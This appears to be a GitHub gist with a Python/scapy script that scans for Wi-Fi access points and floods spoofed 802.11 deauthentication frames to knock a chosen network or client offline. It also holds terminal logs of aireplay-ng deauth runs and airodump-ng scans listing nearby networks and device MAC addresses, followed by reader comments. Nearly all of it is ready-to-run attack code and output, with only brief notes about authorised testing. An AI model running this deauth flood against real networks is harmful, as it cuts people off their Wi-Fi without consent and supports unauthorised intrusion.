@jordan-wright
Last active May 28, 2019 13:48
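# Interactive tail of the script: runs after sniff() has returned and the
# channel hopper has been stopped. Expects `networks` (BSSID -> (essid, channel)),
# `args.interface` and perform_deauth() from the enclosing script.
import subprocess

# Reset our signal handler so CTRL+C at the prompts behaves normally again.
signal.signal(signal.SIGINT, signal.SIG_DFL)
# BSSIDs in `networks` come from scapy in lower case, so normalise the input
# or a correctly typed upper-case address is reported as "not detected".
target_bssid = raw_input('Enter a BSSID to perform an deauth attack (q to quit): ').strip().lower()
while target_bssid not in networks:
    if target_bssid == 'q':
        sys.exit(0)
    # Bug fix: the re-prompt's answer used to be discarded, so one mistyped
    # BSSID looped here forever; assign it so the loop test sees the new value.
    target_bssid = raw_input('BSSID not detected... Please enter another (q to quit): ').strip().lower()
# Get our interface to the correct channel (argv list: the interface name is
# never handed to a shell).
channel = networks[target_bssid][1]
print 'Changing ' + args.interface + ' to channel ' + str(channel)
subprocess.call(['iwconfig', args.interface, 'channel', str(channel)])
# Now we have a bssid that we have detected, let's get the client MAC.
# Upper-case it so the FF:FF:FF:FF:FF:FF broadcast comparison in
# perform_deauth() is not fooled by a lower-case broadcast address.
target_client = raw_input('Enter a client MAC address (Default: FF:FF:FF:FF:FF:FF): ').strip().upper()
if not target_client:
    target_client = 'FF:FF:FF:FF:FF:FF'
# raw_input returns a string but perform_deauth() counts down with it, so
# convert here and re-ask on non-numeric input instead of crashing later.
while True:
    raw_count = raw_input('Number of deauth packets (Default: -1 [constant]): ')
    if not raw_count.strip():
        deauth_pckt_count = -1
        break
    try:
        deauth_pckt_count = int(raw_count)
        break
    except ValueError:
        print 'Please enter a whole number (or leave blank for -1).'
perform_deauth(target_bssid, target_client, deauth_pckt_count)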
root@bt:~# iwconfig wlan0 channel 11
root@bt:~# iwconfig mon0 channel 11
root@bt:~# aireplay-ng --deauth 0 -a 58:6D:8F:3B:96:F8 mon0
23:03:26 Waiting for beacon frame (BSSID: 58:6D:8F:3B:96:F8) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
23:03:26 Sending DeAuth to broadcast -- BSSID: [58:6D:8F:3B:96:F8]
23:03:27 Sending DeAuth to broadcast -- BSSID: [58:6D:8F:3B:96:F8]
23:03:27 Sending DeAuth to broadcast -- BSSID: [58:6D:8F:3B:96:F8]
23:03:28 Sending DeAuth to broadcast -- BSSID: [58:6D:8F:3B:96:F8]
23:03:28 Sending DeAuth to broadcast -- BSSID: [58:6D:8F:3B:96:F8]
23:03:29 Sending DeAuth to broadcast -- BSSID: [58:6D:8F:3B:96:F8]
^C
root@bt:~# airodump-ng mon0
CH 6 ][ Elapsed: 17 mins ][ 2013-01-21 22:49
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
E4:CE:8F:69:ED:7D -1 0 0 0 113 -1 <length: 0>
28:37:37:47:4B:0A -35 19 0 0 1 54e. WPA2 CCMP PSK Bill Wi the Science Fi
58:6D:8F:3B:96:F8 -9 27 3 0 11 54e WPA2 CCMP PSK raidersec
78:CA:39:41:F9:1F -47 17 0 0 1 54e. WPA2 CCMP PSK <length: 0>
A0:21:B7:7D:02:82 -48 15 2 0 6 54e WPA2 CCMP PSK <length: 6>
00:24:14:10:15:F0 -58 21 0 0 11 54e. WPA2 CCMP PSK <length: 1>
C0:3F:0E:1A:DF:22 -64 8 0 0 6 54e WPA TKIP PSK <length: 6>
68:7F:74:F9:B9:AC -68 1 4 0 6 54e. WPA2 CCMP PSK <length: 0>
00:24:14:11:59:C0 -1 0 2 0 128 -1 WPA <length: 0>
02:05:17:7D:0E:FC -1 9 0 0 11 11 OPN print server 5587C5
E0:F8:47:0C:9F:42 -64 10 1 0 11 54e WPA2 CCMP PSK MILKISGOOD
2C:41:38:43:65:0A -68 2 0 0 6 54e. WPA2 CCMP PSK HP-Print-0A-Photosmart 5520
BSSID STATION PWR Rate Lost Frames Probe
(not associated) 6C:3E:6D:3A:15:79 -63 0 - 1 0 2 4610X WIRELESS PLUS,BakerBrosDeli
(not associated) 00:23:15:33:C2:60 -52 0 - 1 0 13 belkin.308
(not associated) 68:B5:99:35:C2:A3 -60 0 - 1 689 20 2WIRE854
(not associated) 00:20:00:BC:26:D5 -65 0 - 1 0 5
(not associated) 20:AA:4B:E4:F8:85 -66 0 - 1 0 2
(not associated) 2C:27:D7:8A:DD:E1 -67 0 - 1 0 2 NETGEAR04
(not associated) 2C:9E:FC:0E:EC:98 -62 0 - 1 293 13 BJNPSETUP
(not associated) 7C:1E:52:05:D7:78 -68 0 - 1 0 1 MM7MJ
(not associated) 1C:C1:DE:E3:5F:86 -38 0 - 1 245 94 2WIRE629
E4:CE:8F:69:ED:7D 10:40:F3:F1:43:4C -63 0 - 1 4 2
00:24:14:11:59:C0 54:04:A6:35:3E:9C -57 0 - 1e 0 8
02:05:17:7D:0E:FC 00:20:00:55:87:C5 -70 0 - 1 52 9
E0:F8:47:0C:9F:42 00:17:AB:61:81:DD -1 1 - 0 0 1
root@bt:~# ifconfig
<snip loopback>
wlan0 Link encap:Ethernet HWaddr 00:c0:ca:69:a3:8b
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
root@bt:~# airmon-ng start wlan0
Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
523 dhclient3
628 dhclient3
1540 dhclient3
Process with PID 1540 (dhclient3) is running on interface wlan0
Interface Chipset Driver
wlan0 Realtek rtl8187 - [phy0]
(monitor mode enabled on mon0)
root@bt:~# ifconfig
<snip loopback>
mon0 Link encap:UNSPEC HWaddr 00-C0-CA-69-A3-8B-30-30-00-00-00-00-00-00-00-00
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:15 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:5085 (5.0 KB) TX bytes:0 (0.0 B)
wlan0 Link encap:Ethernet HWaddr 00:c0:ca:69:a3:8b
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
root@bt:/pentest/crux# python sniff-aps.py -i mon0
/usr/lib/pymodules/python2.6/scapy/crypto/cert.py:10: DeprecationWarning: the sha module is deprecated; use the hashlib module instead
import os, sys, math, socket, struct, sha, hmac, string, time
/usr/lib/pymodules/python2.6/scapy/crypto/cert.py:11: DeprecationWarning: The popen2 module is deprecated. Use the subprocess module.
import random, popen2, tempfile
Press CTRL+c to stop sniffing..
====================================================================================================
Channel ESSID BSSID
====================================================================================================
1 Hidden SSID 78:ca:39:41:f9:1f
1 Bill Wi the Science Fi 28:37:37:47:4b:0a
11 Hidden SSID 00:24:14:10:15:f0
11 raidersec 58:6d:8f:3b:96:f8
^CEnter a BSSID to perform an deauth attack (q to quit): 58:6d:8f:3b:96:f8
Changing mon0 to channel 11
Enter a client MAC address (Default: FF:FF:FF:FF:FF:FF):
Number of deauth packets (Default: -1 [constant]):
Sending Deauth to FF:FF:FF:FF:FF:FF from 58:6d:8f:3b:96:f8
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
<snip>
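def perform_deauth(bssid, client, count):
    """Flood 802.11 deauthentication frames to push `client` off `bssid`.

    Frames are spoofed as coming from the AP to the client; when a specific
    client is given, a second frame spoofed from the client to the AP is sent
    as well. Frames go out in bursts of 64 with a 0.5 s pause between bursts,
    mirroring aireplay-ng --deauth, so `count` is the number of BURSTS, not
    individual frames.

    Args:
        bssid: MAC address of the access point (used as the spoofed sender).
        client: target station MAC, or FF:FF:FF:FF:FF:FF (any case) for
            broadcast.
        count: number of bursts. Negative (the caller's default, -1) means run
            until CTRL+C; 0 sends nothing. Accepts an int or a numeric string,
            since the interactive caller passes raw_input()'s result straight
            through.

    Raises:
        ValueError: if `count` cannot be converted to an integer.

    Note: only use against networks you are authorised to test. Stations and
    APs using 802.11w management-frame protection are expected to discard
    these unauthenticated frames.
    """
    import time
    # raw_input() hands us a str; the old code then crashed on `count -= 1`.
    count = int(count)
    broadcast = client.upper() == 'FF:FF:FF:FF:FF:FF'
    ap_to_cli = Dot11(addr1=client, addr2=bssid, addr3=bssid) / Dot11Deauth()
    cli_to_ap = None
    if not broadcast:
        cli_to_ap = Dot11(addr1=bssid, addr2=client, addr3=bssid) / Dot11Deauth()
    print 'Sending Deauth to ' + client + ' from ' + bssid
    endless = count < 0
    if endless:
        # Previously tested `not count`, which is never true for -1.
        print 'Press CTRL+C to quit'
    try:
        while endless or count > 0:
            for _ in range(64):
                # Send out deauth from the AP
                send(ap_to_cli)
                # If we're targeting a client, also spoof deauth from the client to the AP
                if cli_to_ap is not None:
                    send(cli_to_ap)
            count -= 1
            # The original comment promised the aireplay-style pause between
            # bursts; this is it (skipped after the final burst).
            if endless or count > 0:
                time.sleep(0.5)
    except KeyboardInterrupt:
        pass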
import argparse
from multiprocessing import Process
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import signal
import threading
# Using scapy to perform Deauth Attacks
# Author: Jordan (http://raidersec.blogspot.com)
# Credit: Credit for much of the channel hopping and some of the packet extraction (channel extraction) goes to the great work of airoscapy (http://www.thesprawl.org/projects/airoscapy/)
# Also, credit goes to aircrack-ng for being such an awesome set of tools - http://www.aircrack-ng.org/
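def add_network(pckt, known_networks):
    """Record an access point seen in a Beacon or Probe Response frame.

    Walks the frame's tagged-parameter chain (Dot11Elt layers) looking for the
    SSID element (ID 0) and the DS Parameter Set element (ID 3, one byte =
    channel). The previous version assumed the DS element was always the third
    tag, which the standard does not guarantee and which raised on frames
    where it was not a single byte.

    Args:
        pckt: scapy frame carrying a Dot11 layer and at least one Dot11Elt.
        known_networks: dict mapping BSSID -> (essid, channel); mutated in
            place. A BSSID already present is left untouched.

    Side effects:
        Prints one table row the first time a BSSID is recorded. Frames with
        no DS Parameter Set are skipped, since we could not retune to them.
    """
    bssid = pckt[Dot11].addr3
    if bssid in known_networks:
        return
    essid = 'Hidden SSID'
    channel = None
    elt = pckt[Dot11Elt]
    while isinstance(elt, Dot11Elt):
        if elt.ID == 0:
            # An empty or NUL-filled SSID tag means the AP hides its name
            # (this could be resolved later using our deauth attack).
            if elt.info and '\x00' not in elt.info:
                essid = elt.info
        elif elt.ID == 3 and len(elt.info) == 1:
            # DS Parameter Set: insight originally taken from airoscapy.py
            # (http://www.thesprawl.org/projects/airoscapy/)
            channel = ord(elt.info)
        elt = elt.payload
    if channel is None:
        return
    known_networks[bssid] = (essid, channel)
    print "{0:5}\t{1:30}\t{2:30}".format(channel, essid, bssid)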
# Channel hopper - This code is very similar to that found in airoscapy.py (http://www.thesprawl.org/projects/airoscapy/)
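def channel_hopper(interface):
    """Retune `interface` to a random 2.4 GHz channel once a second, forever.

    Meant to run as a separate Process so the sniffer in the parent sees
    frames from every channel; the parent's SIGINT handler terminates it.
    randrange(1, 13) yields channels 1-12, as in the original (channel 13 is
    never visited) — NOTE(review): widen to 14 if your regulatory domain
    allows it.

    Args:
        interface: name of the monitor-mode interface to retune.
    """
    import subprocess
    while True:
        try:
            channel = random.randrange(1, 13)
            # argv list instead of os.system(): the interface name never
            # passes through a shell. iwconfig's exit status is ignored, as
            # before.
            subprocess.call(['iwconfig', interface, 'channel', str(channel)])
            time.sleep(1)
        except KeyboardInterrupt:
            break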
def stop_channel_hop(signal, frame):
    """SIGINT handler: flag the sniffer to stop and tear down the hopper.

    Raises the module-level `stop_sniff` flag that keep_sniffing() reports to
    scapy's sniff(), then terminates and reaps the `channel_hop` Process. Both
    names are created in the __main__ block. The first parameter shadows the
    `signal` module inside this function only (standard handler signature).
    """
    global stop_sniff
    stop_sniff = True
    hopper = channel_hop
    hopper.terminate()
    hopper.join()
def keep_sniffing(pckt):
    """stop_filter for sniff(): returns True once `stop_sniff` has been set.

    Despite the name, a True result tells sniff() to STOP. The packet
    argument is ignored; the decision rests solely on the module-level flag
    raised by the SIGINT handler.
    """
    should_stop = stop_sniff
    return should_stop
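def perform_deauth(bssid, client, count):
    """Flood 802.11 deauthentication frames to push `client` off `bssid`.

    Frames are spoofed as coming from the AP to the client; when a specific
    client is given, a second frame spoofed from the client to the AP is sent
    as well. Frames go out in bursts of 64 with a 0.5 s pause between bursts,
    mirroring aireplay-ng --deauth, so `count` is the number of BURSTS, not
    individual frames.

    Args:
        bssid: MAC address of the access point (used as the spoofed sender).
        client: target station MAC, or FF:FF:FF:FF:FF:FF (any case) for
            broadcast.
        count: number of bursts. Negative (the caller's default, -1) means run
            until CTRL+C; 0 sends nothing. Accepts an int or a numeric string,
            since the interactive caller passes raw_input()'s result straight
            through.

    Raises:
        ValueError: if `count` cannot be converted to an integer.

    Note: only use against networks you are authorised to test. Stations and
    APs using 802.11w management-frame protection are expected to discard
    these unauthenticated frames.
    """
    import time
    # raw_input() hands us a str; the old code then crashed on `count -= 1`.
    count = int(count)
    broadcast = client.upper() == 'FF:FF:FF:FF:FF:FF'
    ap_to_cli = Dot11(addr1=client, addr2=bssid, addr3=bssid) / Dot11Deauth()
    cli_to_ap = None
    if not broadcast:
        cli_to_ap = Dot11(addr1=bssid, addr2=client, addr3=bssid) / Dot11Deauth()
    print 'Sending Deauth to ' + client + ' from ' + bssid
    endless = count < 0
    if endless:
        # Previously tested `not count`, which is never true for -1.
        print 'Press CTRL+C to quit'
    try:
        while endless or count > 0:
            for _ in range(64):
                # Send out deauth from the AP
                send(ap_to_cli)
                # If we're targeting a client, also spoof deauth from the client to the AP
                if cli_to_ap is not None:
                    send(cli_to_ap)
            count -= 1
            # The original comment promised the aireplay-style pause between
            # bursts; this is it (skipped after the final burst).
            if endless or count > 0:
                time.sleep(0.5)
    except KeyboardInterrupt:
        pass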
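if __name__ == "__main__":
    # Entry point: discover APs while a child process hops channels, then let
    # the operator pick one and run a deauth flood against it (or one of its
    # clients). Needs root and a monitor-mode interface (see airmon-ng). Use
    # only against networks you are authorised to test.
    import subprocess
    parser = argparse.ArgumentParser(description='aircommand.py - Utilize many wireless security features using the Scapy python module')
    parser.add_argument('-i', '--interface', dest='interface', type=str, required=True, help='Interface to use for sniffing and packet injection')
    args = parser.parse_args()
    conf.iface = args.interface
    networks = {}
    stop_sniff = False
    print 'Press CTRL+c to stop sniffing..'
    print '='*100 + '\n{0:5}\t{1:30}\t{2:30}\n'.format('Channel','ESSID','BSSID') + '='*100
    channel_hop = Process(target=channel_hopper, args=(args.interface,))
    channel_hop.start()
    # CTRL+C now stops the hopper and flags the sniffer instead of killing us.
    signal.signal(signal.SIGINT, stop_channel_hop)
    # Sniff Beacon and Probe Response frames to extract AP info
    sniff(lfilter=lambda x: (x.haslayer(Dot11Beacon) or x.haslayer(Dot11ProbeResp)),
          stop_filter=keep_sniffing,
          prn=lambda x: add_network(x, networks))
    # Reset our signal handler so CTRL+C at the prompts behaves normally again.
    signal.signal(signal.SIGINT, signal.SIG_DFL)
    # BSSIDs in `networks` come from scapy in lower case, so normalise the
    # input or a correctly typed upper-case address is "not detected".
    target_bssid = raw_input('Enter a BSSID to perform an deauth attack (q to quit): ').strip().lower()
    while target_bssid not in networks:
        if target_bssid == 'q':
            sys.exit(0)
        # Bug fix: the re-prompt's answer used to be discarded, so one
        # mistyped BSSID looped here forever; assign it so the test sees it.
        target_bssid = raw_input('BSSID not detected... Please enter another (q to quit): ').strip().lower()
    # Get our interface to the correct channel (argv list: the interface name
    # never passes through a shell).
    channel = networks[target_bssid][1]
    print 'Changing ' + args.interface + ' to channel ' + str(channel)
    subprocess.call(['iwconfig', args.interface, 'channel', str(channel)])
    # Now we have a bssid that we have detected, let's get the client MAC.
    # Upper-case it so the FF:FF:FF:FF:FF:FF broadcast comparison in
    # perform_deauth() is not fooled by a lower-case broadcast address.
    target_client = raw_input('Enter a client MAC address (Default: FF:FF:FF:FF:FF:FF): ').strip().upper()
    if not target_client:
        target_client = 'FF:FF:FF:FF:FF:FF'
    # raw_input returns a string but perform_deauth() counts down with it, so
    # convert here and re-ask on non-numeric input instead of crashing later.
    while True:
        raw_count = raw_input('Number of deauth packets (Default: -1 [constant]): ')
        if not raw_count.strip():
            deauth_pckt_count = -1
            break
        try:
            deauth_pckt_count = int(raw_count)
            break
        except ValueError:
            print 'Please enter a whole number (or leave blank for -1).'
    perform_deauth(target_bssid, target_client, deauth_pckt_count)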
root@bt:/pentest/crux# python sniff-aps.py -i mon0
/usr/lib/pymodules/python2.6/scapy/crypto/cert.py:10: DeprecationWarning: the sha module is deprecated; use the hashlib module instead
import os, sys, math, socket, struct, sha, hmac, string, time
/usr/lib/pymodules/python2.6/scapy/crypto/cert.py:11: DeprecationWarning: The popen2 module is deprecated. Use the subprocess module.
import random, popen2, tempfile
Press CTRL+c to stop sniffing..
====================================================================================================
Channel ESSID BSSID
====================================================================================================
6 Hidden SSID a0:21:b7:7d:02:82
11 raidersec 58:6d:8f:3b:96:f8
1 Hidden SSID 78:ca:39:41:f9:1f
1 Bill Wi the Science Fi 28:37:37:47:4b:0a
1 Hidden SSID c8:60:00:95:45:26
1 TTUnet 02:2b:8b:c3:b0:c2
6 Hidden SSID c0:3f:0e:1a:df:22
6 TTUnet 00:24:14:11:2c:c0
6 HP-Print-D6-Deskjet 3520 series a0:b3:cc:d0:28:d6
6 HP-Print-0A-Photosmart 5520 2c:41:38:43:65:0a
6 HP-Print-10-Photosmart 5520 a0:b3:cc:d4:91:10
11 MILKISGOOD e0:f8:47:0c:9f:42
11 print server 5587C5 02:05:17:7d:0e:fc
11 Hidden SSID 00:24:14:10:15:f0
11 TTUnet 00:24:14:11:3b:10
11 Brian’s MacBook Pro b8:8d:12:42:fc:2c
11 TTUnet d8:c7:c8:18:93:30
11 TTUnet 00:24:14:11:8d:20
6 Hidden SSID 68:7f:74:f9:b9:ac
import argparse
from multiprocessing import Process
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import signal
import threading
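def add_network(pckt, known_networks):
    """Record an access point seen in a Beacon or Probe Response frame.

    Walks the frame's tagged-parameter chain (Dot11Elt layers) looking for the
    SSID element (ID 0) and the DS Parameter Set element (ID 3, one byte =
    channel). The previous version assumed the DS element was always the third
    tag, which the standard does not guarantee and which raised on frames
    where it was not a single byte.

    Args:
        pckt: scapy frame carrying a Dot11 layer and at least one Dot11Elt.
        known_networks: dict mapping BSSID -> (essid, channel); mutated in
            place. A BSSID already present is left untouched.

    Side effects:
        Prints one table row the first time a BSSID is recorded. Frames with
        no DS Parameter Set are skipped, since we could not retune to them.
    """
    bssid = pckt[Dot11].addr3
    if bssid in known_networks:
        return
    essid = 'Hidden SSID'
    channel = None
    elt = pckt[Dot11Elt]
    while isinstance(elt, Dot11Elt):
        if elt.ID == 0:
            # An empty or NUL-filled SSID tag means the AP hides its name
            # (this could be resolved later using our deauth attack).
            if elt.info and '\x00' not in elt.info:
                essid = elt.info
        elif elt.ID == 3 and len(elt.info) == 1:
            # DS Parameter Set: insight originally taken from airoscapy.py
            # (http://www.thesprawl.org/projects/airoscapy/)
            channel = ord(elt.info)
        elt = elt.payload
    if channel is None:
        return
    known_networks[bssid] = (essid, channel)
    print "{0:5}\t{1:30}\t{2:30}".format(channel, essid, bssid)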
# Channel hopper - This code is very similar to that found in airoscapy.py (http://www.thesprawl.org/projects/airoscapy/)
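def channel_hopper(interface):
    """Retune `interface` to a random 2.4 GHz channel once a second, forever.

    Meant to run as a separate Process so the sniffer in the parent sees
    frames from every channel; the parent's SIGINT handler terminates it.
    randrange(1, 13) yields channels 1-12, as in the original (channel 13 is
    never visited) — NOTE(review): widen to 14 if your regulatory domain
    allows it.

    Args:
        interface: name of the monitor-mode interface to retune.
    """
    import subprocess
    while True:
        try:
            channel = random.randrange(1, 13)
            # argv list instead of os.system(): the interface name never
            # passes through a shell. iwconfig's exit status is ignored, as
            # before.
            subprocess.call(['iwconfig', interface, 'channel', str(channel)])
            time.sleep(1)
        except KeyboardInterrupt:
            break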
def stop_channel_hop(signal, frame):
    """SIGINT handler: flag the sniffer to stop and tear down the hopper.

    Raises the module-level `stop_sniff` flag that keep_sniffing() reports to
    scapy's sniff(), then terminates and reaps the `channel_hop` Process. Both
    names are created in the __main__ block. The first parameter shadows the
    `signal` module inside this function only (standard handler signature).
    """
    global stop_sniff
    stop_sniff = True
    hopper = channel_hop
    hopper.terminate()
    hopper.join()
def keep_sniffing(pckt):
    """stop_filter for sniff(): returns True once `stop_sniff` has been set.

    Despite the name, a True result tells sniff() to STOP. The packet
    argument is ignored; the decision rests solely on the module-level flag
    raised by the SIGINT handler.
    """
    should_stop = stop_sniff
    return should_stop
if __name__ == "__main__":
    # Entry point: print a table of access points as they are discovered while
    # a child process hops channels. CTRL+C stops the hopper and the sniffer.
    # Needs root and a monitor-mode interface (see airmon-ng).
    arg_parser = argparse.ArgumentParser(description='aircommand.py - Utilize many wireless security features using the Scapy python module')
    arg_parser.add_argument('-i', '--interface', dest='interface', type=str, required=True, help='Interface to use for sniffing and packet injection')
    args = arg_parser.parse_args()
    # Shared state read by add_network()/keep_sniffing() and written by the
    # SIGINT handler.
    networks = {}
    stop_sniff = False
    header = '{0:5}\t{1:30}\t{2:30}'.format('Channel', 'ESSID', 'BSSID')
    rule = '=' * 100
    print 'Press CTRL+c to stop sniffing..'
    print rule + '\n' + header + '\n' + rule
    channel_hop = Process(target=channel_hopper, args=(args.interface,))
    channel_hop.start()
    # From here on CTRL+C is routed to stop_channel_hop() instead of
    # raising KeyboardInterrupt in this process.
    signal.signal(signal.SIGINT, stop_channel_hop)

    def is_ap_frame(frame):
        # Only Beacon and Probe Response frames carry the AP info we want.
        return frame.haslayer(Dot11Beacon) or frame.haslayer(Dot11ProbeResp)

    def record(frame):
        add_network(frame, networks)

    sniff(lfilter=is_ap_frame, stop_filter=keep_sniffing, prn=record)
@skiffer

skiffer commented Feb 2, 2014

fine

@praslnx8

where is main.py

@RIMEH1

RIMEH1 commented Mar 31, 2015

I want to know how I can run your program, and whether I can use it to disconnect a particular device from my network.
Thanks.
